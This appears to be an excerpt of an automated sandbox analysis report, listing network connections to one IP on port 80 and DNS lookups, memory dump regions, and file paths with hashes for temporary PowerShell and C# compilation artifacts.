CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
CH 194.182.164.149:80 194.182.164.149 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp
CH 194.182.164.149:80 194.182.164.149 tcp

Files

memory/3576-0-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp

memory/3576-1-0x00007FFC1B2CD000-0x00007FFC1B2CE000-memory.dmp

memory/3576-3-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp

memory/3576-2-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp

memory/3576-4-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp

memory/3576-5-0x00007FFBDB2B0000-0x00007FFBDB2C0000-memory.dmp

memory/3576-8-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-9-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-7-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-6-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-10-0x00007FFBD8F80000-0x00007FFBD8F90000-memory.dmp

memory/3576-12-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-11-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-14-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-13-0x00007FFBD8F80000-0x00007FFBD8F90000-memory.dmp

memory/3576-17-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-19-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-20-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-18-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-16-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-15-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-30-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-29-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g21p4ijb.0lp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2688-45-0x000002137FB20000-0x000002137FB42000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.cmdline

MD5 47813e6635b8c125e86485fcf60c0b15
SHA1 88972a19d60c3f839a7d68c8dca470416c40e21b
SHA256 62ada42824d7d88e30511fa2d9aeeed46d0583c5ceeff1f6edef66824a27baa5
SHA512 70d1897cdb5c52078e85c6c9e450886f4760aac8f90cc463e586d5202799fc8e3db81ae2449ec295e7364ee1adfeddb7eaa65c25e5da6ca0f1499eec86f459b9

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.0.cs

MD5 f4dd5c682eb7b3b679f084261bfc7c4c
SHA1 70f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA256 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA512 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

\??\c:\Users\Admin\AppData\Local\Temp\zgf5j3bp\CSC25C7100A10844DBB887329B8E6CD3D2.TMP

MD5 dee242d091f553198fe816f1d40c2adb
SHA1 c47417ae41ac38b45c91c9d471a8d44340d9ff76
SHA256 f98935426d043619edf3c471ddca3cf215bbaa65703d094acca64db73caab970
SHA512 3d57f0a806a7085a88bb44fd362ad1ff8af75d22329ac08795faae950912eeca50086535d0c6eae397d72986fe6c40a5f3c420d461cf13f41784e5c9ecff113e

C:\Users\Admin\AppData\Local\Temp\RESB3A0.tmp

MD5 080f0de8cc66f28d18079d9ca52ddc84
SHA1 fd831ca90928e5b2d59678e13b2758a70ccc2e88
SHA256 7176f6e0bf54d6f4d492d956f889afeb1ac223043efea3350b1dca8941c88339
SHA512 97ff8cf026c0069efce135caadac41fa4b203d3dd1440e4a6fbf5e1ba62b5742fcbdb664300595a3075c01fa7dbca19e1d6bb9df4e026005a6fce00103380534

C:\Users\Admin\AppData\Local\Temp\zgf5j3bp\zgf5j3bp.dll

MD5 1bc86bd9132f66e654db7b4f2115816e
SHA1 f1ff16efddd53ccff185e64e1fc26f36a579704f
SHA256 5196cb129396f80181264c5dc7978bbf97398e04a9e393b0e76cdcb017b9bc30
SHA512 e6683ec69be9749ff4424f6a156e814baaeda765ca95f735969d6ef210770c65208388d5fcb700d3e027ec0ab3f7fc707527f261b8ee529673f18f24bd106ff4

memory/2688-58-0x0000021300270000-0x0000021300278000-memory.dmp

memory/3576-62-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/3576-63-0x00007FFC1B2CD000-0x00007FFC1B2CE000-memory.dmp

memory/2688-64-0x0000021318920000-0x000002131939E000-memory.dmp

memory/2688-66-0x0000021319E20000-0x000002131A906000-memory.dmp

memory/2688-67-0x0000021319E20000-0x000002131A906000-memory.dmp

memory/2688-65-0x0000021319E20000-0x000002131A906000-memory.dmp

memory/3576-72-0x00007FFC1B230000-0x00007FFC1B425000-memory.dmp

memory/2688-68-0x0000021319E20000-0x000002131A906000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 a2e5343e64db287a14f3ad5f7bb54189
SHA1 abb5806994fa1b17270cfdd259c32039cd4607f4
SHA256 bc0292e87c6e2bf3eebc65f1dd56769c5e0f00bee11ce543483b815df4b4bb56
SHA512 0399ef9d8f2c565663c896e2c9b8c76eeb503d95462b68f7ecb06a65ef48cd61f9fd133945844d75226b4dfebcfed4f968d77516c959a5259cc09df75f0e3529

memory/2688-78-0x0000021319E20000-0x000002131A906000-memory.dmp